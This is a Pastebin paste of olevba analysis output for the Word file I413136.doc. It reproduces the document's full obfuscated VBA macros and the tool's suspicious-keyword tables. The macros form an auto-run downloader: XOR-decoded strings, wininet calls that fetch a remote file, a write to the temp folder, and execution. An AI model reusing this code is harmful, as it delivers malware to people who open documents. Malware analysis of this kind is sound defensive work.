Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- I413136.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: I413136.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: I413136.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub RAMIRO(FELIX As Long)
- CONRAD
- End Sub
- Sub autoopen()
- RAMIRO (124)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
- Set TOMAS = CreateObject _
- (SHELDON _
- (WINSTON, TOMMIE))
- Dim BRETT As Integer
- BRETT = TOMAS.Open(OLIVER & HUGO)
- End Function
- Public Function GILBERTO(ByRef ERICK As String, ByRef TRENT As Long) As Integer
- GILBERTO = Asc(WOODROW(44, ERICK, _
- ((TRENT Mod SALVATORE(ERICK)) + 1), 1))
- End Function
- Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
- FREDDIE = FREDDIE * 2
- LIONEL = SHELDON(TERRENCE, ENRIQUE)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function SHELDON(ERICK As String, REYNALDO As String) As String
- Dim JERALD As Integer
- Dim EDMOND As Integer
- Dim DARREL As Integer
- For DARREL = 77 To 78
- If DARREL = 70 Then End
- Next DARREL
- Dim TRENT As Long
- Dim TERENCE As String
- For TRENT = 1 _
- To _
- ( _
- SALVATORE _
- (REYNALDO) _
- / 2)
- JERALD = DEWAYNE(REYNALDO, TRENT)
- EDMOND = GILBERTO(ERICK, TRENT)
- TERENCE = TERENCE + EMANUEL(JERALD, EDMOND)
- Next TRENT
- SHELDON = TERENCE
- End Function
- Public Function AUBREY(SANTIAGO As String)
- Dim ALONZO As Long
- ALONZO = 1
- ELIAS ALONZO * 2
- ALONZO = ALONZO + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function SALVATORE(KRISTOPHER As String) As Long
- SALVATORE = Len(KRISTOPHER)
- End Function
- Public Function ELIAS(ERNESTO As Double)
- Dim LIONEL As Object
- Dim ROMAN As Long
- For ROMAN = 14 To 15
- ROMAN = ROMAN + 15
- Next ROMAN
- Dim ELLIS As Object
- For ROMAN = 10 To 20
- ROMAN = ROMAN + 60
- Next ROMAN
- Set ELLIS = LAURENCE
- ROMAN = ROMAN + 5
- Dim LEWIS As Boolean
- If ROMAN > ROMAN * 100 Then End
- LEWIS = ORVILLE(LIONEL, ELLIS)
- ERNESTO = ERNESTO + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Sub DOMINGO(SANTOS As Double)
- AUBREY ("ROYCE")
- End Sub
- Public Function EMANUEL(ByRef JERALD As Integer, ByRef EDMOND As Integer) As String
- EMANUEL = Chr(JERALD Xor EDMOND)
- End Function
- Public Function DEWAYNE(ByRef REYNALDO As String, ByRef TRENT As Long) As Integer
- DEWAYNE = Val("&H" & (WOODROW(12, REYNALDO, MORGAN(TRENT), 2)))
- End Function
- Public Function MORGAN(ByRef TRENT As Long) As Long
- MORGAN = (2 * TRENT) - 1
- End Function
- Public Function LAURENCE() As Object
- Dim ISMAEL As String
- ISMAEL = SHELDON(WINSTON, DARRIN)
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const SLIONEL = "JOHN"
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- WILSON Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- GUSTAVO Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal GARLAND As String, ByVal STEPHANPH As Long, ByVal THOMAS As String, ByVal DEWAYNETOPHER As String, ByVal DANIEL As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- SYLVESTER Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- ROOSEVELT Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #Else
- Public Declare Function WILSON Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
- Public Declare Function GUSTAVO Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal GARLAND As String, ByVal STEPHANPH As Long, ByVal THOMAS As String, ByVal DEWAYNETOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function SYLVESTER Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal PAUL As Long, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function ROOSEVELT Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef JERALD As Integer, ByRef EDMOND As Integer) As String
- WOODROW = Mid$(KRISTOPHER, JERALD, EDMOND)
- SAMMY = SAMMY + 31
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function EFRAIN() As LongPtr
- #Else
- Public Function EFRAIN() As Long
- #End If
- EFRAIN = GUSTAVO(STACYK, EMILIO, vbNullString, vbNullString, 0)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const BRENDAN = 6000
- Private Const STACYK As String = "COURTNEY"
- Private Const EMILIO = 1
- Private Const ELIJAH = &H4000000
- Public Function HUMBERTO(EMMANUEL As Long, ByVal STEPHAN As String) As Boolean
- #If VBA7 And Win64 Then
- Dim LOUIE As LongPtr, STERLING As LongPtr
- #Else
- Dim LOUIE As Long, STERLING As Long
- #End If
- Dim LAMONT As Long
- Dim STACY As String * BRENDAN, GARLAND As String
- Dim MILES As Integer, MICAH As Double
- LOUIE = EFRAIN
- If LOUIE = 0 Then
- Exit Function
- End If
- Dim LUCAS As Boolean
- If BILLIE(STERLING, LOUIE) Then
- End If
- If STERLING = 0 Then
- MICAH = 0
- Else
- SYLVESTER STERLING, STACY, BRENDAN, LAMONT
- GARLAND = STACY
- Dim LOGAN As Integer
- LOGAN = 0
- LOGAN = LOGAN + 33
- If LOGAN > LOGAN + 40 Then End
- Do While LAMONT <> 0
- SYLVESTER STERLING, STACY, BRENDAN, LAMONT
- GARLAND = GARLAND + Mid(STACY, 1, LAMONT)
- Loop
- MICAH = SALVATORE(GARLAND): _
- MILES = LOWELL("JERRY")
- Open STEPHAN _
- For Binary Access Write _
- Lock Write _
- As #MILES
- Put #MILES, _
- , GARLAND
- LOGAN = LOGAN + 62
- If LOGAN < 0 Then End
- Close #MILES
- End If
- WILSON STERLING
- WILSON LOUIE
- GARLAND = ""
- If MICAH Then
- HUMBERTO = True
- End If
- End Function
- #If VBA7 And Win64 Then
- Public Function BILLIE(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function BILLIE(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim PHIL As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = LIONEL(893, WINSTON, TIMMY)
- For PHIL = 14 To 15
- PHIL = PHIL + 5.5
- Next PHIL
- GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
- BILLIE = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: I413136.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const TOMMIE = "123A2E29226A003C3C253C3029353B242B"
- Public Const RANDAL = "1D2222203C36247A622C2D36"
- Public Const TIMMY = "29263F35746B6E29382C273D21352B262A2C2D2D293F67363C256E607E6A7F707562293130"
- Public Const DARRIN = "1231392C3E3028222B67133A24240132363A212C032E2330303C"
- Public Const WINSTON = "HARKENDALLIUS"
- Public Sub CONRAD()
- Dim BERT As Long
- Dim ELBERT As Long
- For ELBERT = 5 To 11
- ELBERT = ELBERT * 3
- Next ELBERT
- DOMINGO (8.2)
- End Sub
- Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
- Dim DREW As Long
- Set OLIVER = IGNACIO(LAURENCE)
- Dim JODY
- Dim HUGO As String
- HUGO = LIONEL(2048, WINSTON, RANDAL)
- For DREW = 144 To 145
- DREW = DREW * 3
- Next DREW
- JODY = OLIVER & HUGO
- If WILFRED(HOMER, JODY) Then
- End If
- If HUMBERTO(589, JODY) Then
- End If
- If WILFRED(HOMER, JODY) Then
- End If
- ORVILLE = RICARDO(OLIVER, HUGO, 9)
- End Function
- Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
- If JERMAINE.FileExists(FORREST) Then
- WILFRED = True
- Else
- WILFRED = False
- End If
- End Function
- Public Function LOWELL(KRISTOPHER As String) As Integer
- LOWELL = FreeFile
- End Function
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement